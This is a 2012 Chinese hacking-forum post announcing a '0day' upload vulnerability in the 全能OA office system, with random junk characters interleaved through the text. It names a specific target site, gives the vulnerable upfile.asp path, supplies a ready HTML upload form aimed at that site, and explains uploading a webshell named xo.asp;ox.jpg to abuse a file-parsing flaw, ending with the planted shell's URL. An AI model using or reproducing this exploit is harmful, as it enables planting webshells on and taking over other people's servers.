找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2222|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
全能OA办公系统 上传漏洞
7 ]9 l) E" c3 l3 L
, R7 j7 @& u( A0 ^( H系统介绍:1 c  z5 O2 v9 u! ?4 i$ ]
! ~/ ]& k$ R5 [* e5 Q
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。0 U. p: Y8 p7 _# l& _/ z' R

% `& b+ o! v; i  E8 H7 b主要功能:& D8 ~$ r+ }$ X4 Q" t. Z
公司通告
$ J! E; Y) d& _- Y5 t0 y' x. X' l工作计划 ; n9 h9 A& n$ Z6 I1 B
通讯助理 ; f' A8 l9 p$ g. G2 n0 Z$ f$ n
客户资源
! j* t( ]* L& X1 Y) J# g  B  s我的公文
6 z6 ^2 a) I2 V! B2 ]& ^# }# V公文传阅
( V/ c2 q' R, A, V, W3 E公共资源 ( C3 T0 H4 [" r, B+ x0 g; ~
资源预约 ! z+ R% B: W8 ^) R
今日考勤 " M- ?2 |- g  R4 Y0 [5 V4 o. n
个人计划
, N6 e( u+ M  [( s; ~& ]个人通讯录 " i1 d" n% x7 K% b+ Q
个人基本档案 2 U& M1 ^; C) ~, X! R. b
未读邮件 1 f& n# D/ q! \/ i" Q: K1 g( e- y
发邮件
3 R  Z& N9 j# P6 e收件夹 8 a3 Q  o+ K3 C- _- W: K5 z
寄件夹
3 N" m+ n# a- s网络硬盘
1 O2 p2 U8 }% [; k, z6 W网络会议
6 d" T. a, a0 y& T: t) K& f网络调查 : H9 h' E1 T7 D- s% V# l  i8 p
交流论坛! k% C( j& s: B5 {# d" X7 F
% ?' _( K' {$ f3 @4 E( i5 u( @1 g
有兴趣测试的朋友可以下源码看看
9 V) b/ {" y7 a9 P8 X, c
) q3 A5 I5 c! u源码下载:
8 i' l0 Y4 V5 ]5 U
" ^- N9 {: s. a2 |4 Ghttp://www.mycodes.net/30/4750.htm" v% l* `7 n' W9 `* l1 R. x

! [9 N1 e0 J6 P9 T1 D漏洞介绍:: G2 I0 y% f4 n
2 M7 G2 f* T- o" Z7 o
由upfile.asp上传文件漏洞引起9 Y# G, m. i; A

7 `) L% G4 q6 s6 l& s6 w测试方法:
  |& e* j2 Y! O
& {) `9 \: V" A2 b3 J使用名小子上传http://www.itlynn.com/upfile.asp即可- e  e% N* J0 Z+ p- |9 T, M+ D

" i* V% Q  `5 A# q6 M7 Y0 U' c! v如果upfile.asp文件被删除不存在。
, E) f0 }; Y, c; J9 s- \2 @
) N/ N* X" s' z9 H  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp/ C8 c! v) b2 O$ l" ~9 y8 A! F! A+ a
' g3 d" Q# Z% z1 r# j
如果存在那么将如下代码保存为upfile.html。4 T; y" ~# x3 o; I

8 p# x, V6 x, L5 `% M" w然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
! B7 v; L' q% y" F" k
1 I; C: F  N  o3 k# ^ $ H! z$ [& T9 b0 S, P! L( q: |/ T

& n+ m( p! F% O01 <table border='0' align="center" cellpadding="5"> 8 t: e" ^7 Z3 T; ]
& ?# k/ Y8 G5 C5 Q! X$ e  D
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">   c( C6 ?! A" ~, {8 J
% Y. g9 Q9 L/ k; }
03 <tr>
! j+ G( u* W1 ]. P1 n+ _
) G6 u" ?& i2 x8 Q' B# W# ^04             <td>报错:</td>
) o. a& P6 a1 @5 H+ M3 U( @: p; u/ r' s
05             <td><input type='radio' name='errnumber' value='0'> : }" {' v0 S/ X  H
6 ~: X! k9 }5 H3 A  I0 N% }
06               自动更名
4 v/ t' d/ C+ O' E; @. r. f0 U" [/ u/ }6 Y4 B+ j9 N6 \
07               <input type='radio' name='errnumber' value='1' checked> : _$ A; z! q5 X5 J
8 K$ E! p& q5 o4 x* a. X& \  ^; g
08               报错方式 + B+ O! S9 ^# G8 d9 x! W6 m& G

" T( I9 I9 h. ^9 |" ?09               <input type='radio' name='errnumber' value='2'> 1 O/ ]2 F5 y5 r( Y. A, m
; U$ j" G) ]# i4 z- h, u
10               直接覆盖</td>
  P8 P: t& c/ L. t2 u- T
7 C; W& v; F& w7 q4 Y  T3 [; g4 ~11           </tr> 6 E" {1 i1 C  }! {* T* O
0 b  S7 P% I/ t- R7 s" O
12           <tr>
" T4 d3 P- J3 g  T3 Q5 ]+ R
! b! h% }# h) M3 v) f& S4 P13             <td>主题:</td>
1 t6 e4 |1 {" i! g' h6 Z% i( W; U5 y# O# ?& x; T& w
14             <td><input type='text' name='filename' size='30'></td>
' D: H) e% ], `9 G- A
- y. E! J) K% S; F15           </tr> & {1 C' S3 s  w- R% Q

8 J! j5 f( @" j  X16           <tr>
& t" D( _3 E0 V1 ~# u+ g6 K4 _+ e' x- l2 ?
17             <td>文件:</td> : [' B1 \( E  L0 n0 y+ M1 Y; v  z
# ~9 ~4 o) I% x7 ]
18             <td><input type="file"name="fruit"size="30"></td>
' K5 p1 c2 L8 O! z6 k+ B, I* J$ Y( N
19           </tr> 0 H: D, j4 _' L! f9 O& K
" z9 p3 r6 [/ q; U/ Z
20           <tr>
, |2 O! H* j2 G" {3 U$ b" ?7 q; P( w. N/ |
21             <td valign='top'>简介:</td>
8 s+ X5 W. d& g6 b+ T% m7 `
4 S! J9 C3 ]6 d8 c( P- P22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 1 l6 a' [, g/ C( w/ @' h

% `- a) N2 f0 q# o" o/ x# M23           </tr>
! L6 M8 ?; U" b% ^+ u/ n! W/ L
4 m/ H' E7 p8 X2 c& R. n1 u24   
8 h/ |) ?  l! Q0 I* a
) [  j( e2 j6 R+ K) z25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> & h4 v! R5 f/ s
2 R! I- K$ d, j; J6 F
26           </tr>
/ K" g2 M! F3 k4 b4 ^4 B0 k  j5 q$ x' @3 H- O9 u
27         </form> # {% |3 ^5 _6 z. E- w
; h) O; }' w$ M% E) B
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
5 z1 H" C; y) t' u+ h' i: ^$ M
! E( H( k7 t2 l" y: ~! L 0 w9 ^5 u  m# H' d) H1 |
: x: @: N3 Y+ T% Y$ Q8 m% S3 p
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
8 {8 j1 E8 _8 _5 \# {3 I9 i5 U- n1 D4 n4 |9 j) T
此漏洞需要配合解析漏洞利用。
  r2 F( }% o) w* S$ f$ ?$ _# {, P! F" v4 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表